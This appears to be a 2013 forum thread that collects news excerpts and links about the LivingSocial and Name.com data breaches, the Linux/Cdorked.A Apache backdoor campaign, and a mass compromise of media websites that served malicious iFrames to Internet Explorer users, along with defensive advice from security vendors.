Bitch Board

[LivingSocial hacked - 50 million advised to change pwds]

FYI...

LivingSocial hacked - 50 million advised to change pwds...
- http://www.theregister.co.uk/2013/04/26/livingsocial_hacking_attack/
26 April 2013 - "Up to 50 million customers of the Amazon-funded daily deals site LivingSocial are getting an apologetic email from CEO Tim O'Shaughnessy explaining that their information may have been stolen. "LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue," he writes in an email... "The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords – technically 'hashed' and 'salted' passwords. We never store passwords in plain text." At this stage, the company is saying that all credit card details for customers, and the financial accounts of operators that LivingSocial does deals with, are stored on a separate database and that this hasn't been hacked. Users are being asked to change their passwords and to ignore any emails claiming to be from LivingSocial that ask for financial information. Although the email doesn’t mention it, if your LivingSocial password was used for any other online accounts, then you'd be advised to change those, too..."

Also see:
- https://www.net-security.org/secworld.php?id=14833
29 April 2013
- http://h-online.com/-1851667
29 April 2013
___

Apache systems using cPanel compromised
- http://h-online.com/-1851442
29 April 2013 - "Researchers at web security firm Sucuri* have discovered modified binaries in the open source Apache web server. The binaries will load malicious code or other web content without any user interaction. Only files that were installed using the cPanel administration tool are currently thought to be affected. ESET says** that several hundred web servers have been compromised. The attack has been named Linux/Cdorked.A and is difficult to detect.."
* http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html
April 26, 2013
** http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
April 26, 2013
- https://www.net-security.org/secworld.php?id=14836
29 April 2013

Apache binary backdoor adds malicious redirect to Blackhole
- https://isc.sans.edu/diary.html?storyid=15710
Last Updated: 2013-04-30

> https://www.virustotal.com/en/file/7b3cd8c1bd0249df458084f28d91648ad14e1baf455fdd53b174481d540070c6/analysis/
File name: cdorked.a.httpd
Detection ratio: 13/44
Analysis date:    2013-04-30

   

[Media sites - mass compromise]

FYI...

Media sites - mass compromise
- http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html
May 6, 2013 - "... Zscaler identified yet another mass website compromise, this one impacting a number of popular media sites, including two radio stations in Washington, DC - Federal News Radio and WTOP. It's not clear if all of the sites impacted were leveraging a common backend platform that may have led to the compromise... Attacks targeting end users generally involve some form of social engineering whereby the potential victim must be convinced to visit a site, download a file, etc. Attackers will therefore write a script designed to comb the web looking for popular sites exposing a common flaw and when identified, inject a single line of malicious code into the sites. In that way, any user visiting the otherwise legitimate (but now infected) site, can become a victim. This particular threat also displays another common trait - being dynamic in nature and only delivering content if the victim browser exhibits certain attributes. In this case, the injected content is only displayed when the browser's User Agent string reveals that Internet Explorer (IE) is being used... obfuscated JavaScript decodes to reveal an iFrame pointing to sites hosted at Dynamic DNS (DynDNS) hosting providers. Thus far, we have identified two DynDNS providers (myftp .biz and hopto .org) involved... Thus far, Zscaler has identified the following compromised sites:
Media Sites:
    WTOP Radio (Washington, DC) - wtop .com
    Federal News Radio (Washington, DC) - federalnewsradio .com
    The Christian Post - christianpost .com
    Real Clear Science - realclearscience .com
    Real Clear Policy - realclearpolicy .com
Others:
    scubaboard .com
    mrsec .com
    menupix .com
    xaxor .com
    gvovideo .com
At the time of posting, these compromised sites were still offering up malicious content."
___

- https://www.net-security.org/malware_news.php?id=2485
May 7, 2013 - "... This particular mass compromise is targeting only Internet Explorer users, probably because the attackers are using exploits only for that particular software. Users who surf to the sites using any other browser don't trigger the redirection chain..."
___

The Onion/Twitter compromise...
- http://h-online.com/-1859850
9 May 2013

 

[Name.com hacked]

FYI...

Name.com hacked...
- https://www.computerworld.com/s/article/9239050/Name.com_forces_customers_to_reset_passwords_following_security_breach
May 9, 2013 - "Domain registrar Name.com forced its customers to reset their account passwords on Wednesday following a security breach on the company's servers that might have resulted in customer information being compromised. Hackers might have gained access to usernames, email addresses, encrypted passwords as well as encrypted credit card information, the company said in an email message sent to customers that was later posted online by users. The credit card information was encrypted with private keys stored in a separate location that wasn't compromised, Name.com said in the email. The company did not specify the type of encryption used, but referred to it as being "strong." The alert email instructed recipients to click on a link in order to perform a password reset, a method that was criticized by some users and security researchers, because it resembles that used in phishing attacks... A hacker group called Hack the Planet (HTP) claimed earlier this week that they compromised Name.com in their attempt to hack into Linode, a virtual private server hosting firm. In a recently published "hacker zine," HTP said that they managed to acquire the domain login for Linode, as well as for Stack Overflow, DeviantArt and others from Name.com. Name.com did not immediately respond to an inquiry seeking confirmation of HTP's claims and other information about the attack..."

- http://www.welivesecurity.com/2013/05/09/name-com-warns-customers-and-resets-passwords-after-breach/
9 May 2013

   

[Cdorked.A malware redirection spreads]

FYI...

Cdorked.A malware redirection spreads ...
- https://atlas.arbor.net/briefs/index#-69874705
May 09, 2013 - "The previously reported Cdorked / Darkleech attack campaign, previously observed affecting Apache servers, has been observed to infect other webservers. The attack has been associated with the delivery of malware.
Analysis: Nginx and Lighttpd have also been seen to be infected as part of this campaign. Original exploitation vectors are not yet well known but past experience suggests that weak passwords and vulnerable web applications could be likely vectors.
ESET offer a tool to detect in-memory traces of this malware - please see: http://www.welivesecurity.com/wp-content/uploads/2013/04/dump_cdorked_config.c
Source: http://www.theregister.co.uk/2013/05/08/cdorked_latest_details/

- http://www.welivesecurity.com/2013/05/07/linuxcdorked-malware-lighttpd-and-nginx-web-servers-also-affected/
7 May 2013 - "... We have observed more than 400 webservers infected with Linux/Cdorked.A. Out of these, 50 are ranked in Alexa’s top 100,000 most popular websites... In a typical attack scenario, victims are redirected to a malicious web server hosting a Blackhole exploit kit. We have discovered that this malicious infrastructure uses compromised DNS servers, something that is out of the ordinary... one point needs to be clear about Linux/Cdorked.A. We still don’t know for sure how this malicious software was deployed on the web servers. We believe the infection vector is not unique. It cannot be attributed solely to installations of cPanel because only a fraction of the infected servers are using this management software. One thing is clear, this malware does not propagate by itself and it does not exploit a vulnerability in a specific software. Linux/Cdorked.A is a backdoor, used by the malicious actor to serve malicious content from legitimate websites... we recommend keeping browsers, browser extensions, operating systems, and third party software like Java, PDF readers and Flash players fully up-to-date to avoid being infected by this on-going campaign. Use of an antivirus program is also recommended..."